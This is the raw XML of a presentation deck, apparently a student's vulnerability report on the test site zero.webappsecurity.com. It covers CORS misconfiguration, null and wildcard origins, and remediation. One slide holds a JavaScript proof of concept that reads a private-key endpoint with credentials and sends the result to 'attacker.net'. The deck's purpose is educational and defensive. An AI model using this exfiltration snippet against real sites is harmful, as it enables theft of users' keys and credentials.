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zero.webappsecurity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7772400" cy="1975104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Task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43000" y="1784350"/>
            <a:ext cx="7315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Due to unavailability of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>Netsparker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> software, OWASP’s Zap application was used to scan the vulnerabilities, therefore the only report produced is manually created.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Three Critical Vulnerabilities were noticed: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Cross-Domain Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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Vulnerable JS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Library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X-Frame-Options Header not set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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Cross-Domain Misconfiguration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70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://zero.webappsecurity.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has vulnerability of Cross Domain Misconfiguration which can be exploited by an attacker in following ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1.  A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>malicious domain can send cookies to zero.webappsecurity.com and the attacker can exploit users credentials from it (Origin Reflection), as shown bellow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP Request:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getPrivateKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Host: www.zero.webappsecurity.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Origin: www.evil-domain.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Connection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Response:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     HTTP/1.1 200 OK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Access-control-allow-credentials: true</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Access-control-allow-origin: www.evil-domain.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" i="1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    {"[private API key]"}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+mn-lt"/>
              </a:rPr>
              <a:t>Or the attacker can exploit can access private keys and get sensitive information of the user.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 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r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+mn-lt"/>
              </a:rPr>
              <a:t>req</a:t>
            </a:r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 = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r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(); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>req.onload</a:t>
            </a:r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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reqListener</a:t>
            </a:r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; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>req.open</a:t>
            </a:r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('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>get','http</a:t>
            </a:r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://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>www.zero.webappsecurity.com</a:t>
            </a:r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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>getPrivateKey',true</a:t>
            </a:r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); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>req.withCredentials</a:t>
            </a:r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 = true;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>req.send</a:t>
            </a:r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();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>reqListener</a:t>
            </a:r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() {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br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location='//attacker.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>log?key</a:t>
            </a:r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='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>this.responseText</a:t>
            </a:r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; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br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};</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t/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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"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73762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>Wildcard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>Origin and Null Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> – Access-Control-Allow-Origin these response headers can be problematic.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng" dirty="0" smtClean="0"/>
              <a:t>Impact </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>- The attacker can exploit credentials or other sensitive information of the users.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reader?url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=zxcvbn.pdf</a:t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Host: docs.google.com</a:t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Origin: null</a:t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HTTP/1.1 200 OK</a:t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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access-Control-Allow-Origin: null</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access-Control-Allow-Credentials: true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49962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="sng" dirty="0" smtClean="0"/>
              <a:t>Regex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="sng" dirty="0" smtClean="0"/>
              <a:t>Locator Issues</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> – Certain expansions of origin are not filtered due to badly implemented regular expressions to validate the origin header. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="sng" dirty="0" smtClean="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> – Attacker can get access to API.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Ensure that sensitive data is not available in an unauthenticated manner (using IP address white-listing, for instance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Configure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the "Access-Control-Allow-Origin" HTTP header to a more restrictive set of domains, or remove all CORS headers entirely, to allow the web browser to enforce the Same Origin Policy (SOP) in a more restrictive manner.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</TotalTime>
  <Words>219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Metro</vt:lpstr>
      <vt:lpstr>Task 2</vt:lpstr>
      <vt:lpstr>Screenshot</vt:lpstr>
      <vt:lpstr>Report</vt:lpstr>
      <vt:lpstr>Cross-Domain Misconfiguration</vt:lpstr>
      <vt:lpstr>Or the attacker can exploit can access private keys and get sensitive information of the user.   var req = new XMLHttpRequest();  req.onload = reqListener;  req.open('get','http://www.zero.webappsecurity.com/api/getPrivateKey',true);  req.withCredentials = true; req.send();  function reqListener() { location='//attacker.net/log?key='+this.responseText;  };   </vt:lpstr>
      <vt:lpstr>2. Wildcard Origin and Null Origin – Access-Control-Allow-Origin these response headers can be problematic. Impact - The attacker can exploit credentials or other sensitive information of the users.   GET /reader?url=zxcvbn.pdf Host: docs.google.com Origin: null  HTTP/1.1 200 OK Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true </vt:lpstr>
      <vt:lpstr>3. Regex Locator Issues – Certain expansions of origin are not filtered due to badly implemented regular expressions to validate the origin header.  Impact – Attacker can get access to API. </vt:lpstr>
      <vt:lpstr>Solution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</dc:title>
  <dc:creator>Admin</dc:creator>
  <cp:lastModifiedBy>Admin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-02T15:36:48Z</dcterms:modified>
</cp:coreProperties>
</file>